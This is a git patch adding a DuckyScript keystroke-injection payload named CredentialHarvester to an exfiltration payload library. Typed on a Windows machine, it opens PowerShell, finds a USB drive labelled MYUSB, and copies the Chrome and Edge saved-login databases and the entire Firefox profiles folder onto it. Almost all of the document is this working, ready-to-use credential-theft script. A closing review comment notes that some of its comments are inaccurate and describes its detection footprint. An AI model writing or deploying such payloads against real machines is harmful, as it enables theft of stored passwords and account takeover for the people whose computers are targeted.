From ddd7d2af4b0cda805b75bfc5842f98dc76bd84c8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 28 May 2024 23:34:46 -0400
Subject: [PATCH] Create CredentialHarvester.txt
---
 .../CredentialHarvester.txt | 58 +++++++++++++++++++
 1 file changed, 58 insertions(+)
 create mode 100644 payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
new file mode 100644
index 0000000..1c607f3
--- /dev/null
+++ b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
@@ -0,0 +1,58 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM Open PowerShell with elevated privileges
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500
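Review bot: The comment `REM Open PowerShell with elevated privileges` does not match the keystrokes under it: `GUI r`, `STRING powershell`, `ENTER` start an ordinary session in the logged-on user's context, and nothing in the hunk requests elevation. I would reword it to `REM Open PowerShell from the Run dialog (current user context, not elevated)`. The header's Description and the `REM Copy Firefox Login Data to USB` comment are also narrower than the behaviour, because that step copies the whole `Profiles\` tree with `-Recurse`; the header should state the full set of files written to the volume labelled MYUSB. For anyone assessing exposure, the footprint visible in these lines is a Run-dialog launch of PowerShell followed by a non-browser process reading the Chrome and Edge `Login Data` files and the Firefox profile directory.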